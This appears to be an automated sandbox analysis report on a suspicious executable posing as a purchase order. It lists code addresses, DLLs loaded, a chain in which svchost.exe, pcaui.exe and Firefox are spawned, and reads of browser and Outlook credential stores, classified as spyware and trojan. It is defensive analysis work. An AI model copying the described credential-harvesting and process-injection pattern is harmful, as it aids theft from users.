                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041410F0_2_0041410F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004002A40_2_004002A4
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041038E0_2_0041038E
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003EE3E30_2_003EE3E3
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041467F0_2_0041467F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004006D90_2_004006D9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0044AACE0_2_0044AACE
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00414BEF0_2_00414BEF
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0040CCC10_2_0040CCC1
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E6F070_2_003E6F07
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003EAF500_2_003EAF50
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FB11F0_2_003FB11F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004431BC0_2_004431BC
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0040D1B90_2_0040D1B9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041724D0_2_0041724D
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003F32000_2_003F3200
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0040123A0_2_0040123A
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004213CA0_2_004213CA
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E93F00_2_003E93F0
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FF5630_2_003FF563
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042B6CC0_2_0042B6CC
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E96C00_2_003E96C0
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E77B00_2_003E77B0
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0044F7FF0_2_0044F7FF
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004179C90_2_004179C9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FFA570_2_003FFA57
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003F3B700_2_003F3B70
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E9B600_2_003E9B60
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E7D190_2_003E7D19
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FFE6F0_2_003FFE6F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00409ED00_2_00409ED0
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E7FA30_2_003E7FA3
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00D795D00_2_00D795D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024887F32_2_024887F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024802432_2_02480243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247E2232_2_0247E223
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247E3672_2_0247E367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247E3732_2_0247E373
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024800232_2_02480023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024711402_2_02471140
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024869F32_2_024869F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02472E102_2_02472E10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0249EED32_2_0249EED3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_024725D02_2_024725D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: String function: 003FEC2F appears 68 times
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: String function: 00406AC0 appears 42 times
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: String function: 0040F8A0 appears 35 times
                Source: PO #2411071822.exe, 00000000.00000003.2051244994.00000000037C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO #2411071822.exe
                Source: PO #2411071822.exe, 00000000.00000003.2051393797.000000000396D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO #2411071822.exe
                Source: PO #2411071822.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/11
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042CE7A GetLastError,FormatMessageW,0_2_0042CE7A
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041AB84 AdjustTokenPrivileges,CloseHandle,0_2_0041AB84
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0041B134
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0042E1FD
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00426532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00426532
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0043C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0043C18C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003E406B
                Source: C:\Users\user\Desktop\PO #2411071822.exeFile created: C:\Users\user\AppData\Local\Temp\aut523D.tmpJump to behavior
                Source: PO #2411071822.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: pcaui.exe, 00000004.00000003.2343695753.0000000003630000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2343794102.0000000003653000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.0000000003653000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.0000000003681000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2346293234.000000000365D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO #2411071822.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\PO #2411071822.exe "C:\Users\user\Desktop\PO #2411071822.exe"
                Source: C:\Users\user\Desktop\PO #2411071822.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #2411071822.exe"
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO #2411071822.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #2411071822.exe"Jump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO #2411071822.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO #2411071822.exeStatic file information: File size 1213440 > 1048576
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PO #2411071822.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMdMEBIcgVB.exe, 00000003.00000000.2076602169.000000000017E000.00000002.00000001.01000000.00000004.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891157004.000000000017E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: PO #2411071822.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PO #2411071822.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PO #2411071822.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PO #2411071822.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PO #2411071822.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_003FE01E LoadLibraryA,GetProcAddress,0_2_003FE01E
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00406B05 push ecx; ret 0_2_00406B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02487257 push 00000020h; iretd 2_2_02487259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02487260 pushad ; retf 2_2_0248726B
